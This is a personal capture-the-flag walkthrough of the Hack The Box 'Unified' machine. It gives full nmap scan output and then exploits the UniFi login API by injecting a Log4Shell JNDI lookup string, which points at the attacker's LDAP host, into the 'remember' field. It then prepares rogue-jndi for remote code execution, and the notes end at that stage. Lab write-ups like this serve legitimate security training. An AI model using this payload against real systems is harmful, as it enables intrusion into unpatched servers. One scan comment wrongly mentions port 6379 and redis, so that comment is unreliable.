04.UNIFIED

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sV -sC -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
 |   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
 |_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
 6789/tcp open  ibm-db2-admin?
 8080/tcp open  http-proxy
 |_http-open-proxy: Proxy might be redirecting requests
 | fingerprint-strings: 
 |   FourOhFourRequest: 
 |     HTTP/1.1 404 
 |     Content-Type: text/html;charset=utf-8
 |     Content-Language: en
 |     Content-Length: 431
 |     Date: Mon, 21 Apr 2025 04:17:37 GMT
 |     Connection: close
 |     <!doctype html><html lang="en"><head><title>HTTP Status 404 
 |     Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 
 |     Found</h1></body></html>
 |   GetRequest, HTTPOptions: 
 |     HTTP/1.1 302 
 |     Location: http://localhost:8080/manage
 |     Content-Length: 0
 |     Date: Mon, 21 Apr 2025 04:17:37 GMT
 |     Connection: close
 |   RTSPRequest, Socks5: 
 |     HTTP/1.1 400 
 |     Content-Type: text/html;charset=utf-8
 |     Content-Language: en
 |     Content-Length: 435
 |     Date: Mon, 21 Apr 2025 04:17:37 GMT
 |     Connection: close
 |     <!doctype html><html lang="en"><head><title>HTTP Status 400 
 |     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
 |_    Request</h1></body></html>
 |_http-title: Did not follow redirect to https://10.129.96.149:8443/manage
 8443/tcp open  ssl/nagios-nsca Nagios NSCA
 | ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
 | Subject Alternative Name: DNS:UniFi
 | Not valid before: 2021-12-30T21:37:24
 |_Not valid after:  2024-04-03T21:37:24
 | http-title: UniFi Network
 |_Requested resource was /manage/account/login?redirect=%2Fmanage
 8843/tcp open  ssl/unknown
 | ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
 | Subject Alternative Name: DNS:UniFi
 | Not valid before: 2021-12-30T21:37:24
 |_Not valid after:  2024-04-03T21:37:24
 | fingerprint-strings: 
 |   GetRequest, HTTPOptions, RTSPRequest: 
 |     HTTP/1.1 400 
 |     Content-Type: text/html;charset=utf-8
 |     Content-Language: en
 |     Content-Length: 435
 |     Date: Mon, 21 Apr 2025 04:17:55 GMT
 |     Connection: close
 |     <!doctype html><html lang="en"><head><title>HTTP Status 400 
 |     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
 |_    Request</h1></body></html>
 8880/tcp open  cddbp-alt?
 | fingerprint-strings: 
 |   FourOhFourRequest: 
 |     HTTP/1.1 404 
 |     Content-Type: text/html;charset=utf-8
 |     Content-Language: en
 |     Content-Length: 431
 |     Date: Mon, 21 Apr 2025 04:17:37 GMT
 |     Connection: close
 |     <!doctype html><html lang="en"><head><title>HTTP Status 404 
 |     Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 
 |     Found</h1></body></html>
 |   GetRequest: 
 |     HTTP/1.1 400 
 |     Content-Type: text/html;charset=utf-8
 |     Content-Language: en
 |     Content-Length: 435
 |     Date: Mon, 21 Apr 2025 04:17:37 GMT
 |     Connection: close
 |     <!doctype html><html lang="en"><head><title>HTTP Status 400 
 |     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
 |     Request</h1></body></html>
 |   HTTPOptions: 
 |     HTTP/1.1 400 
 |     Content-Type: text/html;charset=utf-8
 |     Content-Language: en
 |     Content-Length: 435
 |     Date: Mon, 21 Apr 2025 04:17:43 GMT
 |     Connection: close
 |     <!doctype html><html lang="en"><head><title>HTTP Status 400 
 |     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
 |_    Request</h1></body></html>
 3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
 ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
 SF-Port8080-TCP:V=7.94SVN%I=7%D=4/20%Time=6805C6E2%P=x86_64-pc-linux-gnu%r
 SF:(GetRequest,84,"HTTP/1\.1\x20302\x20\r\nLocation:\x20http://localhost:8
 SF:080/manage\r\nContent-Length:\x200\r\nDate:\x20Mon,\x2021\x20Apr\x20202
 SF:5\x2004:17:37\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(HTTPOptions,84
 SF:,"HTTP/1\.1\x20302\x20\r\nLocation:\x20http://localhost:8080/manage\r\n
 SF:Content-Length:\x200\r\nDate:\x20Mon,\x2021\x20Apr\x202025\x2004:17:37\
 SF:x20GMT\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,24E,"HTTP/1\.1\x
 SF:20400\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Langua
 SF:ge:\x20en\r\nContent-Length:\x20435\r\nDate:\x20Mon,\x2021\x20Apr\x2020
 SF:25\x2004:17:37\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html>
 SF:<html\x20lang=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x93
 SF:\x20Bad\x20Request</title><style\x20type=\"text/css\">body\x20{font-fam
 SF:ily:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white
 SF:;background-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-s
 SF:ize:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x2
 SF:0{color:black;}\x20\.line\x20{height:1px;background-color:#525D76;borde
 SF:r:none;}</style></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\
 SF:x20Bad\x20Request</h1></body></html>")%r(FourOhFourRequest,24A,"HTTP/1\
 SF:.1\x20404\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-La
 SF:nguage:\x20en\r\nContent-Length:\x20431\r\nDate:\x20Mon,\x2021\x20Apr\x
 SF:202025\x2004:17:37\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20h
 SF:tml><html\x20lang=\"en\"><head><title>HTTP\x20Status\x20404\x20\xe2\x80
 SF:\x93\x20Not\x20Found</title><style\x20type=\"text/css\">body\x20{font-f
 SF:amily:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:whi
 SF:te;background-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font
 SF:-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\
 SF:x20{color:black;}\x20\.line\x20{height:1px;background-color:#525D76;bor
 SF:der:none;}</style></head><body><h1>HTTP\x20Status\x20404\x20\xe2\x80\x9
 SF:3\x20Not\x20Found</h1></body></html>")%r(Socks5,24E,"HTTP/1\.1\x20400\x
 SF:20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Language:\x20
 SF:en\r\nContent-Length:\x20435\r\nDate:\x20Mon,\x2021\x20Apr\x202025\x200
 SF:4:17:37\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><html\x
 SF:20lang=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad
 SF:\x20Request</title><style\x20type=\"text/css\">body\x20{font-family:Tah
 SF:oma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;backgr
 SF:ound-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size:16p
 SF:x;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color
 SF::black;}\x20\.line\x20{height:1px;background-color:#525D76;border:none;
 SF:}</style></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\
 SF:x20Request</h1></body></html>");
 ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
 SF-Port8843-TCP:V=7.94SVN%T=SSL%I=7%D=4/20%Time=6805C6F3%P=x86_64-pc-linux
 SF:-gnu%r(GetRequest,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/ht
 SF:ml;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435\r
 SF:\nDate:\x20Mon,\x2021\x20Apr\x202025\x2004:17:55\x20GMT\r\nConnection:\
 SF:x20close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTT
 SF:P\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20t
 SF:ype=\"text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\
 SF:x20h2,\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20
 SF:{font-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}
 SF:\x20p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:
 SF:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP
 SF:\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html>"
 SF:)%r(HTTPOptions,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html
 SF:;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435\r\n
 SF:Date:\x20Mon,\x2021\x20Apr\x202025\x2004:17:55\x20GMT\r\nConnection:\x2
 SF:0close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\
 SF:x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20typ
 SF:e=\"text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x2
 SF:0h2,\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{f
 SF:ont-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x
 SF:20p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1p
 SF:x;background-color:#525D76;border:none;}</style></head><body><h1>HTTP\x
 SF:20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html>")%
 SF:r(RTSPRequest,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;c
 SF:harset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435\r\nDa
 SF:te:\x20Mon,\x2021\x20Apr\x202025\x2004:17:55\x20GMT\r\nConnection:\x20c
 SF:lose\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x2
 SF:0Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=
 SF:\"text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h
 SF:2,\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{fon
 SF:t-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20
 SF:p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;
 SF:background-color:#525D76;border:none;}</style></head><body><h1>HTTP\x20
 SF:Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html>");
 ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
 SF-Port8880-TCP:V=7.94SVN%I=7%D=4/20%Time=6805C6E3%P=x86_64-pc-linux-gnu%r
 SF:(GetRequest,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;cha
 SF:rset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435\r\nDate
 SF::\x20Mon,\x2021\x20Apr\x202025\x2004:17:37\x20GMT\r\nConnection:\x20clo
 SF:se\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20S
 SF:tatus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"
 SF:text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,
 SF:\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{font-
 SF:size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20p\
 SF:x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;ba
 SF:ckground-color:#525D76;border:none;}</style></head><body><h1>HTTP\x20St
 SF:atus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html>")%r(Fo
 SF:urOhFourRequest,24A,"HTTP/1\.1\x20404\x20\r\nContent-Type:\x20text/html
 SF:;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20431\r\n
 SF:Date:\x20Mon,\x2021\x20Apr\x202025\x2004:17:37\x20GMT\r\nConnection:\x2
 SF:0close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\
 SF:x20Status\x20404\x20\xe2\x80\x93\x20Not\x20Found</title><style\x20type=
 SF:\"text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h
 SF:2,\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{fon
 SF:t-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20
 SF:p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;
 SF:background-color:#525D76;border:none;}</style></head><body><h1>HTTP\x20
 SF:Status\x20404\x20\xe2\x80\x93\x20Not\x20Found</h1></body></html>")%r(HT
 SF:TPOptions,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;chars
 SF:et=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435\r\nDate:\
 SF:x20Mon,\x2021\x20Apr\x202025\x2004:17:43\x20GMT\r\nConnection:\x20close
 SF:\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Sta
 SF:tus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"te
 SF:xt/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x
 SF:20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{font-si
 SF:ze:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x2
 SF:0{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;back
 SF:ground-color:#525D76;border:none;}</style></head><body><h1>HTTP\x20Stat
 SF:us\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html>");
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

 * Typically '-sV' is used with Nmap to determine versions, but that's not always enough. 
    - adding the -sC is another good way to determine service versions
       - the -sC option will run safe scripts which are designed to provide useful 
         information without being too intrusive or causing harm to the target systems.
 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
         
 * use the -Pn option of Nmap when ICMP packets are blocked by the Windows firewall
    - the -PN option treats all hosts as online and will skip host discovery

VULNERABILITY SCANNING

root@htb:~$ sudo nmap --script=vuln {targetIP} -p 22,6789,8080,8443,8843,8880
 PORT   STATE SERVICE
 22/tcp   open     ssh
 6789/tcp filtered ibm-db2-admin
 8080/tcp open     http-proxy
 8443/tcp open     https-alt
 | http-enum: 
 |_  /api/: Potentially interesting folder (401 )
 8843/tcp open     unknown
 8880/tcp open     cddbp-alt

Nmap done: 1 IP address (1 host up) scanned in 112.77 seconds

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD

Submit user flag and root flag.

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 username: test
 password: test
 ...
 * submit the expected user input

BURP > Proxy > Intercept > Raw
 ...
 
 * Send to repeater
 
BURP > Repeater
 Request
  ...
  POST /api/login HTTP/1.1
  Host: 10.129.96.149:8443
  Cookie: unifises=ROLvFpn...; csrf_token=29RxNe...
  X-Csrf-Token: 29RxNe...
  
  {
    "username":"test",
    "password":"test",
    "remember":"${jndi:ldap://10.10.14.25/whatever}",    <-- this is the vulnerable parameter
    "strict":true
  }

 * if the request causes the server to connect back to us, 
   then we have verified that the application is vulnerable.
    - ${jndi:ldap://{Tun0 IP Address}/whatever}
       - JNDI (Java Naming and Directory Interface) is an API that allows 
         Java applications to locate and access resources, such as database 
         servers or messaging systems, by making naming and directory 
         service calls.
       - LDAP (Lightweight Directory Access Protocol) is an open, 
         vendor-neutral protocol used to access and manage distributed 
         directory information over a network. It typically runs on port 389.

 Response
  ...
  HTTP/1.1 400 OK
   ...
   
   {
     "meta":{
       "rc":"error",
       "msg":"api.err.InvalidPayload"
     },
     "data":[
     ]
   }
  
 * the error msg states that the payload is invalid, but it did actually
   execute and tried to connect to the remote malicious host/server
   
#monitor the network traffic for LDAP connections.
root@htb:~$ sudo tcpdump -i tun0 port 389

BURP > Repeater > Send
 ...
 tcpdump
 
 * tcpdump will show connections being received from the attacking machine
 
#install Open-JDK & Maven to build a payload that can sent to the server which will provide RCE on the vulnerable system
root@htb:~$ sudo apt update
root@htb:~$ sudo apt install openjdk-11-jdk -y
root@htb:~$ sudo apt install maven

* OpenJDK is the Java Development Kit used to build Java applications, while Maven is a build tool that helps structure projects and compile them into JAR files. Together, they can be used to run the rogue-jndi Java application, which starts a local LDAP server to receive callbacks from vulnerable servers and execute malicious code.

Previous03.VACCINENextTHM

Last updated